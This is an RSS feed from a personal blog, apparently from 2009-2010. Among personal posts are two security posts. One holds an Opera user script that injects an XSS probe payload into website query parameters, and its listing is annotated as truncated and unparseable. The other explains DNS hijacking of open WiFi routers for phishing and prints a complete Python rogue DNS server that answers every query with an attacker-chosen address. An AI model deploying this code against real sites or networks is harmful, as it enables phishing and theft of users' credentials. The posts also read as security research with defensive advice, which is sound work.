<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Samaldis&#039;s Blog</title>
	<atom:link href="http://samaldis.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://samaldis.wordpress.com</link>
	<description>An archive of some of my work</description>
	<lastBuildDate>Fri, 08 Oct 2010 22:02:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='samaldis.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Samaldis&#039;s Blog</title>
		<link>http://samaldis.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://samaldis.wordpress.com/osd.xml" title="Samaldis&#039;s Blog" />
	<atom:link rel='hub' href='http://samaldis.wordpress.com/?pushpress=hub'/>
		<item>
		<title>recent photo.. bit emo i know</title>
		<link>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/</link>
		<comments>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/#comments</comments>
		<pubDate>Fri, 08 Oct 2010 22:02:23 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[My life]]></category>

		<guid isPermaLink="false">https://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/</guid>
		<description><![CDATA[Here&#8217;s a photo I took after buying my superdry jacket..<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=27&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg"><img class="alignnone size-full" src="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg?w=497" alt="" title="superdry"   /></a></p>
<p>Here&#8217;s a photo I took after buying my superdry jacket.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>

		<media:content url="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg" medium="image">
			<media:title type="html">superdry</media:title>
		</media:content>
	</item>
		<item>
		<title>back.</title>
		<link>http://samaldis.wordpress.com/2010/10/08/back/</link>
		<comments>http://samaldis.wordpress.com/2010/10/08/back/#comments</comments>
		<pubDate>Fri, 08 Oct 2010 14:49:22 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">https://samaldis.wordpress.com/2010/10/08/back/</guid>
		<description><![CDATA[I have recently made the change from android to blackberry and because it is so easy to type on this phone I have decided to start publishing to my blog again.. .. I haven&#8217;t decided whether to blog about my personal life or my web security side of things.. Or both. Just watch this space..<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=23&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I have recently made the change from android to blackberry and because it is so easy to type on this phone I have decided to start publishing to my blog again.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .. I haven&#8217;t decided whether to blog about my personal life or my web security side of things.. Or both. Just watch this space..</p>
]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2010/10/08/back/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Black Liquid</title>
		<link>http://samaldis.wordpress.com/2009/09/28/black-liquid/</link>
		<comments>http://samaldis.wordpress.com/2009/09/28/black-liquid/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 17:09:07 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/?p=18</guid>
		<description><![CDATA[this page can be found here: http://www.spinhunters.org/blog/black-liquid/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=18&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>this page can be found here:</p>
<p><a title="http://www.spinhunters.org/blog/black-liquid/" href="http://www.spinhunters.org/blog/black-liquid/" target="_blank">http://www.spinhunters.org/blog/black-liquid/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/09/28/black-liquid/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Opera Security Scripts</title>
		<link>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/</link>
		<comments>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 00:31:34 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/</guid>
		<description><![CDATA[First Published on the now closed 0&#215;000000.com: I got this sent in by Sam Aldis, two nice user scripts created for Opera to test the security in websites by automating XSS c.q. SQL injection. This is really useful if you want to test websites actually. Secondly he also has a simple Javascript console, which in [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=19&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>First Published on the now closed 0&#215;000000.com:</p>
<p>I got this sent in by Sam Aldis, two nice user scripts created for Opera to test the security of websites by automating XSS c.q. SQL injection. This is really useful if you want to test websites actually. Secondly he also has a simple Javascript console, which in turn can be quite useful also. I always wanted to write something similar, so nice ideas to expand on. I also thought about the idea to have Opera run on my second PC which will be dedicated to testing websites for instance. This way you can create a Nessus like scanner, integrated in Opera. Why not, it is certainly possible and only limited by your imagination. By the way, did you know that Opera now has a UserScript virtual I/O file-system <a href="http://dev.opera.com/libraries/fileio/docs/opera.io.filesystem.dml">API</a> in its new version? This enables you to read and write to the computer it runs on in a safe manner. It creates an environment of more possibilities in a stable way for analyzing websites and storing the results if necessary.</p>
<p>aWaT script:</p>
<pre>(function(opera){
/*
	aWaT - Automated Web Attack (A-Wah)
	Created By Sam Aldis
	http://darkstar.me.uk

	thanks to 0x000000.com for the inspiration and for introducing me to
	Opera, as well as for the layout of the output.
*/

	// getCookie(con): return the value stored under the cookie name con, or ""
	// when no usable entry is found. Only values written by setCookie can be
	// read back, because the end of the value is located by the ":" that
	// setCookie appends.
	// NOTE(review): getCookie and the loop index i are assigned without var,
	// so both become globals visible to the page the user script runs in.
	// NOTE(review): the name is matched as a plain substring anywhere in
	// document.cookie, so it can also match inside another cookie's name or
	// value.
	getCookie = function(con){
		var c = document.cookie;
		var cn = con;
		var cnm = 0;	// how many leading characters of cn are matched so far
		var s = 0;	// index of the character right after the matched name
		var e = 0;	// index of the ":" that ends the value
		var xf = 0;	// never read in this function
		for(i=0;i&lt;c.length;i++){
			// the whole name was matched by the preceding characters: record
			// the current position as the start marker
			if(cnm&gt;=cn.length){
				var s = i;	// same function-scoped s as declared above
			}
			// advance the match counter, or start over on the first mismatch
			if(c[i]==cn[cnm]){
				cnm++;
			}
			else{
				cnm = 0;
			}
			// once a start is known, the first ":" seen fixes the end
			if(s != 0 &amp;&amp; e == 0){
				if(c[i] == ":"){
					e = i;
				}
			}
		}
		// skip the character at s (expected to be "=") and take everything up
		// to e; when nothing was found the length is negative and substr
		// returns ""
		var text = c.substr(s+1,e-s-1);
		return(text);
	}
	// Store data under cname, terminated by ":" so that getCookie can find
	// the end of the value (a lone cookie has no trailing ";" to rely on).
	// No path or expiry is supplied, so the browser applies its defaults.
	setCookie = function(cname,data){
		var serialized = cname + "=" + data + ":";
		document.cookie = serialized;
	}
	// query-string parameter names the script looks for in the current URL
	var vars = ['q','query','search','page','username','user','id','tag','record','listing','name','type','text','msg','message'];
	// message line terminator and the accumulated report text
	var crlf = ". \r\n";
	var xss_msg = "";
	// Main body. The "awat" cookie is the per-domain state:
	//   "" or "0"  no probe outstanding
	//   "1"        the current URL carries the probe marker 01536362
	//   "2"        the user clicked the banner; testing is off for this domain
	if(getCookie("awat")!="2"){
		window.addEventListener('load', function(e) {
			// the banner link appends endt=1; seeing it switches testing off
			if(document.location.href.indexOf("&amp;endt=1")!=-1){
					setCookie("awat","2");
			}
			else{
				if(getCookie("awat") != 1){
					// The test is a literal search of the serialized DOM for the
					// script-tag marker. A page that HTML-encodes reflected
					// parameters will not contain the raw marker.
					if(document.body.innerHTML.indexOf("&lt;script&gt;void(192)&lt;/script&gt;")== -1){
						// NOTE(review): the bound vars.length + 1 runs one index past
						// the array, so the last pass looks for a parameter literally
						// named "undefined". k is also an implicit global.
						for(k=0;k&lt;vars.length + 1;k++){
							if(document.location.href.indexOf("&amp;" + vars[k] + "=") &gt; 0 || document.location.href.indexOf("?" + vars[k] + "=") &gt; 0){
								if(getCookie("awat")==""||getCookie("awat")=="0"){
									var cloc = document.location.href;
									// NOTE(review): this line is added merely because the
									// parameter name occurs in the URL, before anything
									// has been checked.
									xss_msg += "Possible XSS in variable " + vars[k] + crlf;
									// the parameter is appended a second time with the
									// marker as its value; the original value is kept
									var nloc = cloc + "&amp;" + vars[k] + "=" + "&lt;script&gt;void(192)&lt;/script&gt;";
									// NOTE(review): the next call is truncated in the
									// published listing; its arguments are not recoverable
									// from the page, and as printed the script does not
									// parse.
									setCookie(
									document.location = nloc + "&amp;01536362";
								}
							}
						}
					}
					else{
						xss_msg += "XSS found at location: " + document.location.href + crlf;
						// NOTE(review): xf is not declared in this scope (the var xf
						// in getCookie is local to it), so this creates a global.
						xf = 1;
					}
				}
				else{
					// State 1: only the absence of the marker is reported here.
					// NOTE(review): when the marker is present in this state,
					// nothing is appended to xss_msg and no banner is shown.
					if(document.body.innerHTML.indexOf("&lt;script&gt;void(192)&lt;/script&gt;") == -1){
						xss_msg += "No XSS found in page" + crlf;
						xf = 1;
					}
				}
				if (xss_msg != '' &amp;&amp; xss_msg != undefined ) {
					// NOTE(review): "xf = 1" is an assignment, not a comparison, so
					// this branch is always taken once xss_msg is non-empty.
					if(xf = 1){
						// displays the output text, style taken from arioso created
						// by 0x000000.com.
						// The message is inserted with createTextNode below, so its
						// content (which includes the current URL) is added as text
						// and not parsed as markup.
						var p = document.createElement('a');
						p.style.position = 'fixed';
				                p.style.top = '0px';
				                p.style.left  = '0px';
				                p.style.width = '100%';
						p.style.opacity = '.90';
						p.style.filter = 'alpha(opacity=90)';
				                p.style.border = '1px dotted #f30';
				                p.style.padding = '3px';
				                p.style.font = '8pt sans-serif';
				                p.style.backgroundColor  = '#f00';
				                p.style.color = '#fff';
						// clicking the banner reloads with endt=1, handled at the top
						p.href = document.location + "&amp;endt=1";
						p.appendChild(document.createTextNode('aWa message: ' + xss_msg + " Click to stop testing on this domain"));
						document.body.appendChild(p);
						// record whether the current URL is a probe URL (state 1) or
						// not (state 0) for the next page load
						if(document.location.href.indexOf("&amp;01536362") == -1){
							setCookie("awat","0");
						}
						else{
							setCookie("awat","1");
						}
					}
			    }
			}
		}, false);
	}
})(window.opera);</pre>
<p>Javascript console script:</p>
<pre>/*
	Javascript Console@http://www.google.co.uk/js
	created by Sam Aldis

	A very simple way to execute javascript in your browser.
*/
(function(opera){
	// After the page has loaded, replace it with a small console UI, but only
	// on the one URL this script claims; every other page is left untouched.
	window.addEventListener('load',function(loadEvent) {
		var consoleUrl = "http://www.google.co.uk/js";
		if(document.location.href != consoleUrl){
			return;
		}
		document.title = "JS Console";
		// NOTE(review): the Eval button passes the textarea content to eval()
		// inside this page, so whatever is typed or pasted there runs with the
		// www.google.co.uk origin, including access to its cookies and DOM.
		var consoleMarkup = "&lt;style&gt;body{ background-color: black; color: red;}textarea{background-color:black; color: red;}input{background-color: black; color: red;}&lt;/style&gt;&lt;div align='center'&gt;&lt;img src='http://www.google.co.uk/intl/en_uk/images/logo.gif'&gt;&lt;br /&gt;&lt;textarea id='js' name='js' cols='60' rows='20'&gt;javascript&lt;/textarea&gt;&lt;br /&gt;&lt;input type='button' value='Eval' onclick='eval(document.getElementById(\"js\").value)'&gt;&lt;/div&gt;";
		document.body.innerHTML = consoleMarkup;
	},false);
})(window.opera);</pre>
]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Wifi Ownage</title>
		<link>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/</link>
		<comments>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 00:25:31 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/?p=15</guid>
		<description><![CDATA[I have recently been doing research into WiFi connections without wepkeys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing. Imagine [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=15&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div class="screen"><a href="http://flickr.com/photos/mulletar/234750266/"><img src="http://farm1.static.flickr.com/42/234750266_35dd875a8c.jpg?v=0" alt="WARNING: LOAFING AROUND OR DANCING WILL RESULT IN OWNAGE" /></a></div>
<p>I have recently been doing research into WiFi connections without WEP keys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing.</p>
<p>Imagine you are at a hotel with your laptop. You connect to the WiFi that they provide and type in www.google.com, which brings up google’s front page. The address bar says http://www.google.com and the page looks genuine so it is.. isn’t it? However, attackers could have gained access to the router and changed the primary DNS server through many of the available methods in the wild, like <a href="http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play">UPnP hacking</a>, etc.</p>
<p>Theoretically, the attacker could use any IP address to pull the trick, as long as a DNS server was listening on UDP port 53. But it would be more beneficial if the attacker is in control of this DNS server, so he/she is able to show the user whatever they want them to see. For example, the user could type in their bank’s website address and end up at a phishing page but they wouldn’t know because they would see their bank’s address in the title bar and the page could be made to look exactly the same (and auto-update itself through some PHP magic). When the user logs in, a fake DNS server will respond which will make the user go to the wrong IP address. As you can see this is a big threat that will affect anyone who hasn’t secured their network.</p>
<p>I have created a Python script which can act as a temporary DNS server which will direct all requests to a certain IP (keep checking <a href="http://darkstar.me.uk/">http://darkstar.me.uk</a> for updates). Here is the script that implements the scenario described above:</p>
<pre><code># DNS Injection Server
# Created By fazed
# DNSQuery class adapted from Francisco Santos's
# code. why re-invent the wheel?

from socket import *

class DNSQuery:
 # Minimal parser and responder for a single DNS datagram. The code indexes
 # the payload as a Python 2 byte string (ord() on single characters).
 def __init__(self, data):
   # data: the raw UDP payload as received. self.domain ends up holding the
   # queried name with a trailing dot, or '' if the message was not parsed.
   self.data=data
   self.domain=''

   # 4-bit field taken from the third header byte (shifted right by 3, masked
   # with 15); in the DNS header this is the opcode, and 0 is a standard query
   tipo = (ord(data[2]) &gt;&gt; 3) &amp; 15
   if tipo == 0:
     # the question name starts right after the 12-byte header and is a run
     # of length-prefixed labels ended by a zero length byte
     # NOTE(review): there are no bounds checks. A payload that is too short
     # or ends inside the name raises IndexError from ord(), and a length
     # byte that is really a compression pointer is read as a plain length.
     ini=12
     lon=ord(data[ini])
     while lon != 0:
       self.domain+=data[ini+1:ini+lon+1]+'.'
       ini+=lon+1
       lon=ord(data[ini])

 def respond(self, ip):
   # Build the reply for this query with ip (dotted-quad string) as the
   # answer. Returns '' when no name was parsed in __init__.
   # The query type is never inspected, so every parsed query gets the same
   # A record whatever name or record type was asked for.
   packet=''
   if self.domain:
     # transaction id copied from the query, then fixed flags 0x8180
     packet+=self.data[:2] + "\x81\x80"
     # question count copied into both the question and answer counts;
     # authority and additional counts are zero
     packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
     # everything after the header is echoed back unchanged
     # NOTE(review): this also echoes any bytes that followed the question
     # in the query while the additional count above is set to zero
     packet+=self.data[12:]
     # answer name: compression pointer to offset 12, i.e. the question name
     packet+='\xc0\x0c'
     # type 1 (A), class 1 (IN), TTL 0x3c = 60 seconds, data length 4
     packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
     # the four address bytes; int() or chr() raises on a malformed ip
     packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
   return packet

# Startup and serve loop (Python 2 syntax: print statements, raw_input).
print ":: DNS Injection Server Started ::"
sh = socket(AF_INET, SOCK_DGRAM)
print "Socket Handle Created.."
# '' binds every local interface; 53 is the standard DNS port
sh.bind(('',53))
print "Socket Handle Bound To UDP Port 53"
# the single address returned for every name that is queried
# NOTE(review): the value is not validated here; respond() converts each
# dotted part with int() and chr(), so a malformed value only fails when the
# first query is answered.
ip = raw_input("IP to inject: ")
try:
   while 1:
       # one datagram per iteration, at most 1024 bytes are read
       data, addr = sh.recvfrom(1024)
       print "DNS Request From:", addr[0]
       p = DNSQuery(data)
       print "Sending IP address:", ip
       # NOTE(review): respond() returns '' for queries it did not parse, so
       # an empty datagram is sent back in that case
       sh.sendto(p.respond(ip),addr)
       print "Response Sent.."
# NOTE(review): only Ctrl-C is handled. Any other exception, for example the
# IndexError DNSQuery raises on a malformed payload, ends the loop without
# reaching sh.close().
except KeyboardInterrupt:
   print ":: DNS Injection Server Stoped ::"
   sh.close()</code></pre>
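<p>The bottom line is: secure your networks and don’t trust public WiFi access points. A familiar address in the address bar proves nothing on a network whose DNS you do not control; only an HTTPS connection with a valid certificate ties the page to the name you typed.</p>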
]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>

		<media:content url="http://farm1.static.flickr.com/42/234750266_35dd875a8c.jpg?v=0" medium="image">
			<media:title type="html">WARNING: LOAFING AROUND OR DANCING WILL RESULT IN OWNAGE</media:title>
		</media:content>
	</item>
	</channel>
</rss>
